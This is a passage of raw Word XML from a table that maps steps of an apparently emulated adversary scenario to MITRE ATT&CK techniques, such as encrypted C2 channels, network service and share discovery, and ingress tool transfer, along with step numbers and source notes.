                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>8</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1609" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0769DEA0" w14:textId="77777777" w:rsidR="00DA330B" w:rsidRPr="00442F82" w:rsidRDefault="00DA330B" w:rsidP="00486595">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00442F82">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>TA</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="00442F82">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>0011 :</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="00442F82">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve"> Command and Control</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2291" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="038E5DCC" w14:textId="77777777" w:rsidR="00DA330B" w:rsidRPr="0035652A" w:rsidRDefault="00DA330B" w:rsidP="00486595">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="00665981">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve">T1573.001 </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>:</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="00665981">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Encrypted Channel: Symmetric Cryptography</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="649" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="07B0FB08" w14:textId="609D54C6" w:rsidR="00DA330B" w:rsidRDefault="00593B1C" w:rsidP="00486595">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>17</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="651" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2B9B23EB" w14:textId="77777777" w:rsidR="00DA330B" w:rsidRPr="002D1D50" w:rsidRDefault="00DA330B" w:rsidP="00486595">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="556" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="79BDC92E" w14:textId="0ECA1277" w:rsidR="00DA330B" w:rsidRPr="002D1D50" w:rsidRDefault="00593B1C" w:rsidP="00486595">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>S</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="825" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="00DBEF9D" w14:textId="251AA77A" w:rsidR="00DA330B" w:rsidRPr="002D1D50" w:rsidRDefault="009C415E" w:rsidP="00486595">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>IF-C2C</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3435" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1083FDEE" w14:textId="702AF7B3" w:rsidR="00DA330B" w:rsidRDefault="00DA330B" w:rsidP="00486595">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>[9] Example exfiltration communication</w:t>
            </w:r>
            <w:r w:rsidR="00D647E7">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t xml:space="preserve"> (and next command)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00DA330B" w:rsidRPr="0033163A" w14:paraId="5A5F42FE" w14:textId="77777777" w:rsidTr="00BF7C25">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="440" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6CC27B19" w14:textId="3B9307FF" w:rsidR="00DA330B" w:rsidRPr="0033163A" w:rsidRDefault="0033163A" w:rsidP="00C64366">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="0033163A">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t xml:space="preserve">19 </w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1609" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7BF971CD" w14:textId="2B583841" w:rsidR="00DA330B" w:rsidRPr="0033163A" w:rsidRDefault="0033163A" w:rsidP="00C64366">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="0033163A">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>TA</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="0033163A">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>0007 :</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="0033163A">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t xml:space="preserve"> Discovery</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2291" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2B8FD244" w14:textId="6419FEE4" w:rsidR="00DA330B" w:rsidRPr="0033163A" w:rsidRDefault="0033163A" w:rsidP="00C64366">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="0033163A">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>T</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="0033163A">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>1046</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t xml:space="preserve"> :</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="0033163A">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>Network Service Discovery</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="649" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="478239DE" w14:textId="368FA4DE" w:rsidR="00DA330B" w:rsidRPr="0033163A" w:rsidRDefault="00593B1C" w:rsidP="00C64366">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>18</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="651" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="69F2D835" w14:textId="77777777" w:rsidR="00DA330B" w:rsidRPr="0033163A" w:rsidRDefault="00DA330B" w:rsidP="00C64366">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="556" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="245D4BF0" w14:textId="3FB4AC0B" w:rsidR="00DA330B" w:rsidRPr="0033163A" w:rsidRDefault="00593B1C" w:rsidP="00C64366">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>S</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="825" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2A36F222" w14:textId="7CA824CB" w:rsidR="00DA330B" w:rsidRPr="0033163A" w:rsidRDefault="009C415E" w:rsidP="00C64366">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>NP-DIS</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3435" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="18F3C1D2" w14:textId="2E2F81C1" w:rsidR="00DA330B" w:rsidRPr="0033163A" w:rsidRDefault="0033163A" w:rsidP="00C64366">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>From ATT&amp;CK group description</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0033163A" w:rsidRPr="0033163A" w14:paraId="4C70DBFD" w14:textId="77777777" w:rsidTr="00BF7C25">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="440" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6382C201" w14:textId="4217B509" w:rsidR="0033163A" w:rsidRPr="0033163A" w:rsidRDefault="0033163A" w:rsidP="00C64366">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>20</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1609" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2A59933B" w14:textId="282DD05E" w:rsidR="0033163A" w:rsidRPr="0033163A" w:rsidRDefault="0033163A" w:rsidP="00C64366">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0007 :</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t xml:space="preserve"> Discovery</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2291" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4972035E" w14:textId="1165B790" w:rsidR="0033163A" w:rsidRPr="0033163A" w:rsidRDefault="0033163A" w:rsidP="00C64366">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>T</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>1135 :</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="0033163A">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>Network Share Discovery</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="649" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="35F80B2F" w14:textId="5316676C" w:rsidR="0033163A" w:rsidRPr="0033163A" w:rsidRDefault="00593B1C" w:rsidP="00C64366">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>19</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="651" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="07D1E258" w14:textId="77777777" w:rsidR="0033163A" w:rsidRPr="0033163A" w:rsidRDefault="0033163A" w:rsidP="00C64366">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="556" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="19E4FC66" w14:textId="1D8A6E9B" w:rsidR="0033163A" w:rsidRPr="0033163A" w:rsidRDefault="00593B1C" w:rsidP="00C64366">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>S</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="825" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="00B391E7" w14:textId="397579FA" w:rsidR="0033163A" w:rsidRPr="0033163A" w:rsidRDefault="009C415E" w:rsidP="00C64366">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>NP-DIS</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3435" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="03F0EAEB" w14:textId="56125D36" w:rsidR="0033163A" w:rsidRDefault="0033163A" w:rsidP="00C64366">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>From ATT&amp;CK group description</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00F2132E" w:rsidRPr="002D1D50" w14:paraId="39BDF558" w14:textId="77777777" w:rsidTr="00486595">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="440" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3D6FBFA3" w14:textId="029CFF79" w:rsidR="00F2132E" w:rsidRDefault="00F2132E" w:rsidP="00486595">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>21</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1609" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="03179E12" w14:textId="77777777" w:rsidR="00F2132E" w:rsidRPr="00442F82" w:rsidRDefault="00F2132E" w:rsidP="00486595">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00442F82">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>TA</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="00442F82">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>0011 :</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="00442F82">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve"> Command and Control</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2291" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3C17C173" w14:textId="77777777" w:rsidR="00F2132E" w:rsidRPr="0035652A" w:rsidRDefault="00F2132E" w:rsidP="00486595">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="00665981">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve">T1573.001 </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>:</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="00665981">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Encrypted Channel: Symmetric Cryptography</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="649" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7665395C" w14:textId="465484C6" w:rsidR="00F2132E" w:rsidRDefault="00593B1C" w:rsidP="00486595">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>20</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="651" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="24567470" w14:textId="77777777" w:rsidR="00F2132E" w:rsidRPr="002D1D50" w:rsidRDefault="00F2132E" w:rsidP="00486595">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="556" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="23BDA376" w14:textId="3376792C" w:rsidR="00F2132E" w:rsidRPr="002D1D50" w:rsidRDefault="00593B1C" w:rsidP="00486595">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>S</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="825" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3D34B73D" w14:textId="5A556D41" w:rsidR="00F2132E" w:rsidRPr="002D1D50" w:rsidRDefault="009C415E" w:rsidP="00486595">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>IF-C2C</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3435" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2A66830B" w14:textId="1F82168A" w:rsidR="00F2132E" w:rsidRDefault="00F2132E" w:rsidP="00486595">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t xml:space="preserve">[9] Example </w:t>
            </w:r>
            <w:r w:rsidR="000132D7">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t xml:space="preserve">discovery info </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>exfiltration communication (and next command)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00F2132E" w:rsidRPr="000132D7" w14:paraId="58B322AD" w14:textId="77777777" w:rsidTr="00BF7C25">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="440" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7D4F73A2" w14:textId="56B3CA59" w:rsidR="00F2132E" w:rsidRPr="000132D7" w:rsidRDefault="000132D7" w:rsidP="00C64366">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="000132D7">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>22</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1609" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6C140390" w14:textId="5D2A8656" w:rsidR="00F2132E" w:rsidRPr="000132D7" w:rsidRDefault="000132D7" w:rsidP="00C64366">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="000132D7">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>TA</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="000132D7">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>0011 :</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="000132D7">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t xml:space="preserve"> Command and Control</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2291" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="56D992F0" w14:textId="5D9FFAEE" w:rsidR="00F2132E" w:rsidRPr="000132D7" w:rsidRDefault="000132D7" w:rsidP="00C64366">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>T</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>1105 :</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t xml:space="preserve"> Ingress Tool </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>Transer</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="649" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="73E6E31E" w14:textId="76884A6C" w:rsidR="00F2132E" w:rsidRPr="000132D7" w:rsidRDefault="00593B1C" w:rsidP="00C64366">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>21</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="651" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7BA3DF3F" w14:textId="77777777" w:rsidR="00F2132E" w:rsidRPr="000132D7" w:rsidRDefault="00F2132E" w:rsidP="00C64366">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="556" w:type="dxa"/>
          </w:tcPr>
